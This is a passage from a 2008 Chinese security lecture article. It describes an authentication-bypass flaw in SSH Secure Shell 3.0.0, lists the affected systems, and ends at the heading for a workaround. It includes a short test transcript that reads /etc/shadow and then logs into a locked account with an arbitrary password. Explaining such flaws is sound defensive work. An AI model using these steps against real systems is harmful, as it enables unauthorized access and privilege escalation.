网络安全讲座之：审计结果(8)

减小字体

增大字体作者：风未起时来源：中国站长学院发布时间：2008-10-20 19:37:27

SSH 3.0 远程登录漏洞

　　受影响的系统:

　　SSH Secure Shell 3.0.0、
　　Red Hat Linux 6.1
　　Red Hat Linux 6.2
　　Red Hat Linux 7.0
　　Red Hat Linux 7.1
　　Sun Solaris 2.6
　　Sun Solaris 2.7
　　Sun Solaris 8
　　HP-UX 10.20
　　HP-UX 11.00
　　Caldera Linux 2.4
　　Suse Linux 6.4
　　Suse Linux 7.0

　　不受影响系统:

　　SSH Secure Shell 3.0.1、SSH Secure Shell 2.x、SSH Secure Shell 1.2.x

　　SSH Secure Shell 3.0.0存在一个远程安全漏洞。如果某个帐号的口令域中只包含两个或者更少的字符，远程攻击者就可以使用任何口令包括空口令登录进入这些帐号。很多Unix系统有一些缺省的锁定帐号。例如Solaris,很多管理帐号"lp"，"adm","bin"等。在/etc/shadow文件中的口令域为"NP"。在一些Linux系统中，一些锁定帐号的口令域为"!!"。如果这些系统正在使用SSH 3.0.0，那么攻击者就可能远程登录进入系统。潜在地可能获取root权限。

　　测试程序：

--------------------------------------------------------------------------------

[root@shiva /root]# cat /etc/shadow | grep "postgres"

postgres:!!:11515:0:99999:7:::

[root@shiva /root]# ssh -l postgres localhost

postgres's password:

Authentication successful.

Last login: Sat Jul 21 2001 09:09:21 -0700 from localhost

bash$ logout

Connection to localhost closed.

--------------------------------------------------------------------------------

　　临时解决方法：